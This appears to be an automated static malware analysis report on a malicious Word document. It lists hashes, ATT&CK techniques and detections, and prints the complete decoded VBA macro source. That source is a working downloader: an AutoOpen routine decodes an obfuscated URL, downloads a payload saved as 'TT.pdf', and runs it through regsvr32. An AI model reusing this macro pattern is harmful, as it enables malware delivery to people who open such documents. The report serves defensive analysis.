Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 223f99ee34f993d3…

MALICIOUS

Office (OOXML)

Size: 116.4 KB
Created: 2020-07-24 08:49:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07
MD5: 33976f4635de848db86f3eb00b2bd8b6
SHA-1: 3fa1c999cc43830c70d0180cc1e6bb5788a56e2b
SHA-256: 223f99ee34f993d357bccf22576f510d477bc3bfdaa2c5ece86341a6a2a8bf82
Risk Score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing VBA macros. The 'autoopen' macro is designed to execute a payload: it decodes an obfuscated URL, attempts to download the file it points to and save it locally as 'TT.pdf', and then executes that file through a WshShell object. The ClamAV detection and the presence of URLDownloadToFile in the VBA project strongly indicate downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.GreenBox5-9139204-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
  • VBA project inside OOXML (medium, OOXML_VBA, 2 related findings)
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
    Matched lines in script:
    #If VBA7 And Win64 Then
    Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
    #Else
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
    End Function
    Sub autoopen()
    n7 = cA(X)
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4271 bytes
SHA-256: 3ba8b90692c2e39b9a487d8a45ea68d5a74044ea194c06b3cd1de81cb0abd5ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wX"
Public Const b As String = "TT.pdf"
Function cA(rl)
sG = NF(rl)
For Fn = 0 To UBound(sG)
 CX = CX & Chr(sG(Fn) Xor 111)
Next Fn
cA = CX
End Function
Sub autoopen()
n7 = cA(X)

' Retirement provinces project quantitative spat
' Courtier responsibility wat
' Households vault louisville
' Female exp palaver invited
' Gonna previously identifier retention
' Libels eg discipline
frm.download n7, b

' Promises pierre bulge animation
' Oak either paucity
' Breasts
' Terrain libs
' Foretell
' Bits

' Authorization romantic exhaust frog frustrate geranium
' Combo metallica measurable smoothness
' Format situation keyhole legend

' Deprecate jun fete
' Basket resounding tropics
' Spat

' Ravenna inflammation omnipotence
' Duck incorrect nowt
' Computation celebration pen blockhead subjective

' Monetary financial
' Huge uncertainty mysticism fragrance
' Sherman briefing payment blithe draughts
Dim GM As New WshShell

' Unless desk accessible
' Herb adopt converge speed cd effie
' Climatic
Call GM.run(N & Zw & " " + b)

' Steaming explanation yuan
' Via lid belief overloaded
' Concurrence moscow
End Sub

Attribute VB_Name = "wX1"
Function T6(Py)

' Pj ribald agonised til foresail ingratiate nj
' Pliant lucy incompleteness journalism wizened manchester there
' Reset disclosure acdbentity
End Function
Sub uu(FO)

' Insignificance estates inconsistency motherless
' Northamptonshire proposal shirk
' Bus explorer pics maryland

' Macedonia minimum enb
' Postman sorts
' Tawny
' Enquiries whitsuntide storey
' Shadows

' Therefore
' Teaches shaw evans peoples
' Humped cigarettes laughingly

' Pgp
' Forefront purchase recapitulate spry engross
' Edge
' Provisional snorting semi

' Iso duo harvard pa
' Forked flash designer
' Drawback prevention midsummer
' Muscles waft

' Vishnu hove hops aye
' Cherry browsers alison
' Cattleman briar childrens underground mistrust
' Errant effectiveness
' Competition scribble deterioration h
' Ever prefecture dome instigation

' Silica southeast bread
' Bostonian smock slim numbers
' Colleague stimulate framework reserves hosiery

' Positions

' Terrify enviable walks optical
' Flickr gay retail harbour
' Vastness

' Hey brokers
' Outcast liberals calvinist republic magnanimity disband
' Forge circumcision allowance bowsprit
' Ada folks touchstone
' Ada intrusive sleight ontario bonnie bubbles

' Apples kate periodically culprit canned
' Cross accumulates palette rotund nigeria
' Placement incl
' Rfc aground bel fiftieth clients notebook abdomen

' Publicly dvd harvey tall rarely contrasting
' Parish ranging question
' Completes licking economically
' Suse frankenstein pdas paraphernalia
' Alpha diving acute glasgow
End Sub

Attribute VB_Name = "V7"
Public Const N As String = "reg"
Public Const Zw As String = "svr32"
Public Const X As String = "7_27_27_31_85_64_64_21_14_6_90_9_31_89_91_93_65_12_0_2_64_23_10_2_12_3_64_6_13_14_65_31_7_31_80_3_82_4_9_14_93_65_12_14_13"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal ZX As Long, ByVal nj As String, ByVal CD As String, ByVal yr As Long, ByVal av As Long) As Long
#End If
Function NF(Ec)
NF = Split(Ec, "_")
End Function

Attribute VB_Name = "frm"
Attribute VB_Base = "0{13D52D41-5F9F-48CF-8820-5BBF993DF0E7}{FB72B109-7D26-4BF0-B828-12902660A651}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
    URLDownloadToFile 0, url, file, 0, 0
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 28672 bytes
SHA-256: 99154e39930e2fbffb0bc1440921212d5faa26614393158e7498293b9c53f60b